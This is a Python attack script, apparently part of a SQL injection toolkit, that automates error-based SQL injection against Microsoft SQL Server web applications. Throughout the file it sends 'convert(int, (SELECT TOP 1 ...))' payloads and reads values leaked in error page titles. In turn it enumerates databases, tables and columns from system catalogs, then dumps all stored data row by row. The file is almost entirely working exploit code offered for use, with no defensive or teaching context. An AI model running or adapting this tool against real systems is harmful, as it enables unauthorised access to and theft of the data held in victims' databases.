#!/usr/bin/env python3

from urllib.parse import quote_plus as urlenc
from bs4 import BeautifulSoup as bs
from time import sleep
import sys

from pysqllib.sender import RequestSender
from pysqllib.arguments import Arguments
from pysqllib.commonfunc import *


def return_contents(r):
    # config here
    contents = bs(r.text, 'html.parser')
    return contents.title.string.split("'")[1]


def retr_loop(sender, payload1, payload2):
    result = []
    i = 0
    retry = 0
    while True:
        not_in = ','.join([f"'{elem}'" for elem in result]) or "''"
        payload = payload1 + urlenc(not_in) + payload2
        if args.p.verbose:
            print_verbose(payload)

        for _ in range(sender.retry):
            try:
                r = sender.send_request(payload)
                break
            except KeyboardInterrupt:
                exit(1)
            except:
                sleep(args.wait_sec)
        else:
            raise Exception('request error')

        try:
            content = return_contents(r)
        except KeyboardInterrupt:
            exit(1)
        except:
            retry += 1
            if retry == sender.retry:
                break
            sleep(args.wait_sec)
            continue

        result.append(content)
        print(f"{i}: {content}")
        sleep(args.wait_sec)
        i += 1
        retry = 0

    return result


def retr_database(sender):
    base = [
        "convert(int, (SELECT TOP 1 name FROM master..sysdatabases WHERE name not in (", ")))"]
    print('databases:')
    payload3 = urlenc("convert(int, DB_NAME())")
    if args.p.verbose:
        print_verbose(payload3)
    r = sender.send_request(payload3)
    content = return_contents(r)
    print(f"current: {content}")

    payload1 = urlenc(base[0])
    payload2 = urlenc(base[1])
    databases = retr_loop(sender, payload1, payload2)

    print()
    print(','.join(databases))


def retr_tables(sender, databases):
    print('tables:')

    base = ["convert(int, (SELECT TOP 1 name FROM ",
            "..sysobjects WHERE xtype = 'U' AND name not in (", ")))"]

    tables = {}
    for db in databases:
        print(f"{db}:")
        payload1 = urlenc(base[0] + db + base[1])
        payload2 = urlenc(base[2])
        tables[db] = retr_loop(sender, payload1, payload2)

        print()
        print(','.join(tables[db]))
        print()


def retr_columns(sender, databases, tables):
    print('columns:')

    base = ["convert(int, (SELECT TOP 1 ", "..syscolumns.name FROM ",
            "..syscolumns, ", "..sysobjects WHERE ",
            "..syscolumns.id=", "..sysobjects.id AND ",
            "..sysobjects.name='", "' AND ",
            "..syscolumns.name not in (", ")))"]

    columns = {}
    for db in databases:
        print(f"{db}:")
        columns[db] = {}
        for tb in tables[db]:
            print(f"*{tb}:")
            payload1 = urlenc(base[0] + db + base[1] + db + base[2] + db +
                              base[3] + db + base[4] + db + base[5] + db +
                              base[6] + tb + base[7] + db + base[8])
            payload2 = urlenc(base[9])

            columns[db][tb] = retr_loop(sender, payload1, payload2)

            print()
            print(','.join(columns[db][tb]))
            print()


def retr_data(sender, databases, tables, columns):
    print('data:')

    base = ["convert(int, (SELECT TOP 1 ", " FROM ",
            "..", " WHERE ", " not in (", ")))"]
    data = {}
    for db in databases:
        print(f"{db}:")
        data[db] = {}
        for tb in tables[db]:
            print(f"*{tb}:")
            data[db][tb] = {}
            for cl in columns[db][tb]:
                print()
                print(f"**{cl}:")
                payload1 = urlenc(base[0] + cl + base[1] +
                                  db + base[2] + tb + base[3] + cl + base[4])
                payload2 = urlenc(base[5])

                data[db][tb][cl] = retr_loop(sender, payload1, payload2)

    print_data(databases, tables, columns, data)


def main():
    sender = RequestSender(args)

    if args.command == 'database':
        retr_database(sender)
    elif args.command == 'table':
        retr_tables(sender, args.databases)
    elif args.command == 'column':
        retr_columns(sender, args.databases, args.tables)
    elif args.command == 'data':
        retr_data(sender, args.databases, args.tables, args.columns)
    else:
        print('error: unreachable', file=sys.stderr)


if __name__ == '__main__':
    args = Arguments()
    main()
